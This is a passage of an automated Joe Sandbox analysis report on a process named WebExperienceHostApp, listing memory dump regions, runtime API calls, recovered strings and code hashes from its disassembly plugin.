                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
                                                                    • String ID: ios_base::failbit set
                                                                    • API String ID: 1934640635-3924258884
                                                                    • Opcode ID: 86b4e5238144139d03474f40a88081f60eccb49d5d50e335382d98dbc759b6c8
                                                                    • Instruction ID: bf4aba9c99a7e869d7ec9e80946269ebc698f2ebe6e55dddab3404a707d488d6
                                                                    • Opcode Fuzzy Hash: 86b4e5238144139d03474f40a88081f60eccb49d5d50e335382d98dbc759b6c8
                                                                    • Instruction Fuzzy Hash: 8A21EB25B0AB8295DA60CB51E4402A9B794FB88FE0F544631EF9C43BAEEF3CC5458740
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1883312675.00007FFE13301000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000006.00000002.1883278501.00007FFE13300000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883340934.00007FFE13311000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883363676.00007FFE13316000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883384636.00007FFE13317000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe13300000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: Name::operator+
                                                                    • String ID: void$void
                                                                    • API String ID: 2943138195-3746155364
                                                                    • Opcode ID: 1fd1239767cdba175521d54b038567421754ad18fe50b3a3e7fd3ac15f670715
                                                                    • Instruction ID: 104d10a43184bad3d2cf3e15a4e1a5c1d37811e36991075c15bcc9ae9ef56aca
                                                                    • Opcode Fuzzy Hash: 1fd1239767cdba175521d54b038567421754ad18fe50b3a3e7fd3ac15f670715
                                                                    • Instruction Fuzzy Hash: 8B313762E18F558CFB01CBA6E8400EC37B0BB68768B444576DE9E62B79DF3C9144C748
                                                                    APIs
                                                                    • localeconv.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FFE0028C674), ref: 00007FFE0028F244
                                                                      • Part of subcall function 00007FFE002BBAE0: ___lc_codepage_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFE00286043), ref: 00007FFE002BBB00
                                                                      • Part of subcall function 00007FFE002BBAE0: ___mb_cur_max_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFE00286043), ref: 00007FFE002BBB08
                                                                      • Part of subcall function 00007FFE002BBAE0: ___lc_locale_name_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFE00286043), ref: 00007FFE002BBB11
                                                                      • Part of subcall function 00007FFE002BBAE0: __pctype_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFE00286043), ref: 00007FFE002BBB2D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: ___lc_codepage_func___lc_locale_name_func___mb_cur_max_func__pctype_funclocaleconv
                                                                    • String ID: false$true
                                                                    • API String ID: 2502581279-2658103896
                                                                    • Opcode ID: 9b59a3e52013d521e33c9098de8e5753f24b95a6832a3519e6095e988c635fb6
                                                                    • Instruction ID: 02c9cc7838e6353f1b7bc4eba5ad1ada3d5bd512d927deabc12f6801a07aaacb
                                                                    • Opcode Fuzzy Hash: 9b59a3e52013d521e33c9098de8e5753f24b95a6832a3519e6095e988c635fb6
                                                                    • Instruction Fuzzy Hash: C821802A909B8681E721DF20E4403AA3BA4FB98798F944536DB8D0736EDF3CD555C780
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: ActivationCreateFactoryReferenceStringWindows
                                                                    • String ID: Windows.Foundation.Diagnostics.AsyncCausalityTracer
                                                                    • API String ID: 1966789792-167870777
                                                                    • Opcode ID: 44bba69f27772335a2dabfed7dfb8568543d36035e0c3b799b1208cc61387a4d
                                                                    • Instruction ID: d0796fa766e20efae2a30207882e83790b74156c79c24fd846f98a512b6067d3
                                                                    • Opcode Fuzzy Hash: 44bba69f27772335a2dabfed7dfb8568543d36035e0c3b799b1208cc61387a4d
                                                                    • Instruction Fuzzy Hash: EC218922B18A8782EB10CB15E4543693BA4FB89B88F500132EB8D0776ACF3DEA44C300
                                                                    APIs
                                                                      • Part of subcall function 00007FFE13306430: RtlPcToFileHeader.API-MS-WIN-CORE-RTLSUPPORT-L1-1-0 ref: 00007FFE13306474
                                                                      • Part of subcall function 00007FFE13306430: RaiseException.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FFE133064BA
                                                                    • RtlPcToFileHeader.API-MS-WIN-CORE-RTLSUPPORT-L1-1-0 ref: 00007FFE133060FF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1883312675.00007FFE13301000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000006.00000002.1883278501.00007FFE13300000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883340934.00007FFE13311000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883363676.00007FFE13316000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883384636.00007FFE13317000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe13300000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: FileHeader$ExceptionRaise
                                                                    • String ID: Access violation - no RTTI data!$Bad dynamic_cast!
                                                                    • API String ID: 3685223789-3176238549
                                                                    • Opcode ID: a6639cd7f69626a89f4ca9d3667c59b83a4044ca09e137da1a34bb00ff92109c
                                                                    • Instruction ID: 3e98f4079eaa088d610f1798b9b883313e9338a24dd782f09fffe1b30e0400d4
                                                                    • Opcode Fuzzy Hash: a6639cd7f69626a89f4ca9d3667c59b83a4044ca09e137da1a34bb00ff92109c
                                                                    • Instruction Fuzzy Hash: F1017161E2AE47DAEE40DB12E4511BC6320FFA0BB4F905071D5AE176BAEF6CD548C308
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: __std_exception_copy
                                                                    • String ID: V($ V(
                                                                    • API String ID: 592178966-3086894444
                                                                    • Opcode ID: eeda7a81354d959ff5dcd7f3cc2f4c04538c781562ddcfa46482a9261517d49f
                                                                    • Instruction ID: db776152c17eb7c4d8422f8c2d2038d6bb2d43c94a15070619a14aab9610e665
                                                                    • Opcode Fuzzy Hash: eeda7a81354d959ff5dcd7f3cc2f4c04538c781562ddcfa46482a9261517d49f
                                                                    • Instruction Fuzzy Hash: 00F0D036E19B8691D7019F15E5800A97765FBA8B44B54D132DFDC0232AFF38D9E5C340
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: __std_exception_copy
                                                                    • String ID: V($ V(
                                                                    • API String ID: 592178966-3086894444
                                                                    • Opcode ID: 1671d71038be9c9497c04db3728284d0d862222d1263297ef78ca9999c5eddd0
                                                                    • Instruction ID: 5d7e250701c2d7d17e2a2a4854a40631e0ca2019229266ae3161b7eaf2de29c9
                                                                    • Opcode Fuzzy Hash: 1671d71038be9c9497c04db3728284d0d862222d1263297ef78ca9999c5eddd0
                                                                    • Instruction Fuzzy Hash: 2EF0BD26E19B8691D7019F15E5800A97765EBA8B44B54D132DB9C0232AFF38D9E5C340
                                                                    APIs
                                                                      • Part of subcall function 00007FFE1330E970: _IsNonwritableInCurrentImage.LIBCMT ref: 00007FFE1330EA30
                                                                      • Part of subcall function 00007FFE1330E970: RtlUnwindEx.API-MS-WIN-CORE-RTLSUPPORT-L1-1-0(?,?,?,?,?,?,?,00007FFE1330E735), ref: 00007FFE1330EA7F
                                                                      • Part of subcall function 00007FFE13306770: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE133023AE), ref: 00007FFE1330677E
                                                                    • terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1330E75A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1883312675.00007FFE13301000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000006.00000002.1883278501.00007FFE13300000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883340934.00007FFE13311000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883363676.00007FFE13316000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883384636.00007FFE13317000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe13300000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentImageNonwritableUnwindabortterminate
                                                                    • String ID: csm$f
                                                                    • API String ID: 4189928240-629598281
                                                                    • Opcode ID: 6b267538cdc2106bb9cc523324cb098b503f0df6c4cb79035cd1b191454f8ac5
                                                                    • Instruction ID: 1180fcff34380c607dc41aa0cca1371750988c2fce50c3723a0a9508a2d3b731
                                                                    • Opcode Fuzzy Hash: 6b267538cdc2106bb9cc523324cb098b503f0df6c4cb79035cd1b191454f8ac5
                                                                    • Instruction Fuzzy Hash: 90E09335D08F4385D7505B13B14417D67B4EF25FB4F244074E69C16666CE3CD8504659
                                                                    APIs
                                                                    • _W_Getdays.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FFE0028699D
                                                                      • Part of subcall function 00007FFE00284D90: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFE002971DD,?,?,?,?,?,?,?,?,?,00007FFE0029B15E), ref: 00007FFE00284DB9
                                                                      • Part of subcall function 00007FFE00284D90: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFE002971DD,?,?,?,?,?,?,?,?,?,00007FFE0029B15E), ref: 00007FFE00284DE8
                                                                      • Part of subcall function 00007FFE00284D90: memcpy.VCRUNTIME140_APP(?,?,00000000,00007FFE002971DD,?,?,?,?,?,?,?,?,?,00007FFE0029B15E), ref: 00007FFE00284DFF
                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFE002869BA
                                                                    Strings
                                                                    • :Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday, xrefs: 00007FFE002869C5
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: free$Getdaysmallocmemcpy
                                                                    • String ID: :Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday
                                                                    • API String ID: 1347072587-3283725177
                                                                    • Opcode ID: f597a48114be3c6915887c42bc8e5feb8ace438d66b9616608920e23ae2e9610
                                                                    • Instruction ID: 2fff52aa60e7c88c5370d5083807a28e2d84e805a808c387d7df6d507bf6d3b2
                                                                    • Opcode Fuzzy Hash: f597a48114be3c6915887c42bc8e5feb8ace438d66b9616608920e23ae2e9610
                                                                    • Instruction Fuzzy Hash: F9E03922609B4282EA109F11E48436967B0EF88B94F981032DA4D063AAEF3CD884C780
                                                                    APIs
                                                                    • _W_Getmonths.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FFE002869ED
                                                                      • Part of subcall function 00007FFE00284D90: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFE002971DD,?,?,?,?,?,?,?,?,?,00007FFE0029B15E), ref: 00007FFE00284DB9
                                                                      • Part of subcall function 00007FFE00284D90: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFE002971DD,?,?,?,?,?,?,?,?,?,00007FFE0029B15E), ref: 00007FFE00284DE8
                                                                      • Part of subcall function 00007FFE00284D90: memcpy.VCRUNTIME140_APP(?,?,00000000,00007FFE002971DD,?,?,?,?,?,?,?,?,?,00007FFE0029B15E), ref: 00007FFE00284DFF
                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFE00286A0A
                                                                    Strings
                                                                    • :Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:Dece, xrefs: 00007FFE00286A15
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: free$Getmonthsmallocmemcpy
                                                                    • String ID: :Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:Dece
                                                                    • API String ID: 1628830074-2030377133
                                                                    • Opcode ID: 27da167e1864dcdf294359a8b0a44747903f76c57d9256877098d303ea31171d
                                                                    • Instruction ID: b8924115f23e34a8dc93cb7a51b4dba07247ad3c556e3d8b71495ef65a0bd41c
                                                                    • Opcode Fuzzy Hash: 27da167e1864dcdf294359a8b0a44747903f76c57d9256877098d303ea31171d
                                                                    • Instruction Fuzzy Hash: D5E06D21619B0381EB409F21F48436967A4EF84BC4F845032DB4E0676EEF3CD8C4C380
                                                                    APIs
                                                                    • _Getdays.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FFE0028627D
                                                                      • Part of subcall function 00007FFE00284D10: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFE00292134,?,?,?,00007FFE0028439B,?,?,?,00007FFE00285AE1), ref: 00007FFE00284D32
                                                                      • Part of subcall function 00007FFE00284D10: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFE00292134,?,?,?,00007FFE0028439B,?,?,?,00007FFE00285AE1), ref: 00007FFE00284D58
                                                                      • Part of subcall function 00007FFE00284D10: memcpy.VCRUNTIME140_APP(?,?,?,00007FFE00292134,?,?,?,00007FFE0028439B,?,?,?,00007FFE00285AE1), ref: 00007FFE00284D70
                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFE0028629A
                                                                    Strings
                                                                    • :Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday, xrefs: 00007FFE002862A5
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: free$Getdaysmallocmemcpy
                                                                    • String ID: :Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday
                                                                    • API String ID: 1347072587-3283725177
                                                                    • Opcode ID: e3e5c3688c4805bfe07b39f3b0bc76f695c360df353ad2bd69f5daf1469f8f09
                                                                    • Instruction ID: 668e30f912a3b12578d986264aeec5bda3207d7d54cfb71d4549c842630ddc4f
                                                                    • Opcode Fuzzy Hash: e3e5c3688c4805bfe07b39f3b0bc76f695c360df353ad2bd69f5daf1469f8f09
                                                                    • Instruction Fuzzy Hash: 97E0E511619B4382EB019F51F544369A7A0EF84BD5F984035DB4D0676EEF7CDC94C350
                                                                    APIs
                                                                    • _Getmonths.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FFE002862ED
                                                                      • Part of subcall function 00007FFE00284D10: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFE00292134,?,?,?,00007FFE0028439B,?,?,?,00007FFE00285AE1), ref: 00007FFE00284D32
                                                                      • Part of subcall function 00007FFE00284D10: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFE00292134,?,?,?,00007FFE0028439B,?,?,?,00007FFE00285AE1), ref: 00007FFE00284D58
                                                                      • Part of subcall function 00007FFE00284D10: memcpy.VCRUNTIME140_APP(?,?,?,00007FFE00292134,?,?,?,00007FFE0028439B,?,?,?,00007FFE00285AE1), ref: 00007FFE00284D70
                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFE0028630A
                                                                    Strings
                                                                    • :Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:December, xrefs: 00007FFE00286315
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: free$Getmonthsmallocmemcpy
                                                                    • String ID: :Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:December
                                                                    • API String ID: 1628830074-4232081075
                                                                    • Opcode ID: 0e3ca20c2d103951e4d7d7801fc3e20d684566a9d28fb9907ec1b8d7555c0598
                                                                    • Instruction ID: 634374a02b28581bb43cf8726c7ce1ff9e65394890004ad786ee42eba8437777
                                                                    • Opcode Fuzzy Hash: 0e3ca20c2d103951e4d7d7801fc3e20d684566a9d28fb9907ec1b8d7555c0598
                                                                    • Instruction Fuzzy Hash: 6CE0ED21A09B4381EB059F51F58536967A0EF98BC4F984036DB4D0676EEF7CD894C380
                                                                    APIs
                                                                      • Part of subcall function 00007FF60BD74580: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF60BD753C5,?,?,00000000,00007FF60BD75353), ref: 00007FF60BD7458F
                                                                      • Part of subcall function 00007FF60BD74580: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF60BD753C5,?,?,00000000,00007FF60BD75353), ref: 00007FF60BD7459D
                                                                      • Part of subcall function 00007FF60BD74580: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF60BD753C5,?,?,00000000,00007FF60BD75353), ref: 00007FF60BD745B2
                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF60BD7780C
                                                                    • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF60BD7781A
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882624863.00007FF60BD71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF60BD70000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882563067.00007FF60BD70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1882667394.00007FF60BD7A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1882704903.00007FF60BD7E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1882737371.00007FF60BD7F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff60bd70000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$Process$AllocFree
                                                                    • String ID:
                                                                    • API String ID: 756756679-0
                                                                    • Opcode ID: 468bbb36f5f0524bfad220df1c36bc57dc39595cc71b805c81501286b27ccc0c
                                                                    • Instruction ID: 91216ded38114957ab4b3f6b46a885548eead1fa41403413cbab5fb8cf307d8e
                                                                    • Opcode Fuzzy Hash: 468bbb36f5f0524bfad220df1c36bc57dc39595cc71b805c81501286b27ccc0c
                                                                    • Instruction Fuzzy Hash: C2318662A5894186F718EB25D4112EDA360EF9C784F64C231EA4EC76E6FFBCD545C700
                                                                    APIs
                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF60BD76878,?,?,?,00007FF60BD767A6), ref: 00007FF60BD76CE7
                                                                    • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF60BD76878,?,?,?,00007FF60BD767A6), ref: 00007FF60BD76CF5
                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF60BD76878,?,?,?,00007FF60BD767A6), ref: 00007FF60BD76D13
                                                                    • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF60BD76878,?,?,?,00007FF60BD767A6), ref: 00007FF60BD76D21
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882624863.00007FF60BD71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF60BD70000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882563067.00007FF60BD70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1882667394.00007FF60BD7A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1882704903.00007FF60BD7E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1882737371.00007FF60BD7F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff60bd70000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$FreeProcess
                                                                    • String ID:
                                                                    • API String ID: 3859560861-0
                                                                    • Opcode ID: 0056834fd57f5863927073a6cb3a8cdd4485bbb69fd36fa37474e5618a9aa299
                                                                    • Instruction ID: 24f365864e29c6fd3c33bb1fb7872b69653dc58463c6d59587cba850422e24bc
                                                                    • Opcode Fuzzy Hash: 0056834fd57f5863927073a6cb3a8cdd4485bbb69fd36fa37474e5618a9aa299
                                                                    • Instruction Fuzzy Hash: 8301ADB2A04B4186EB149F12F5400ADB760FB4CB80B288131CF4E93B64EF78E4A6C340
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: free
                                                                    • String ID:
                                                                    • API String ID: 1294909896-0
                                                                    • Opcode ID: 7ad3a6edda06eaf9da7d43210142655a193d10ee84286b762144f3f5892102b8
                                                                    • Instruction ID: e414ed001c30e3900232d10dc86017f9b2d64e73efa7eef56d0f344b0ca65e4e
                                                                    • Opcode Fuzzy Hash: 7ad3a6edda06eaf9da7d43210142655a193d10ee84286b762144f3f5892102b8
                                                                    • Instruction Fuzzy Hash: DAE09A66A14E1283EB54AF21E8540286770EFD8FD5B281073DF4E46339CFA8E8948300
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2003131783.00007FF74CC31000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF74CC30000, based on PE: true
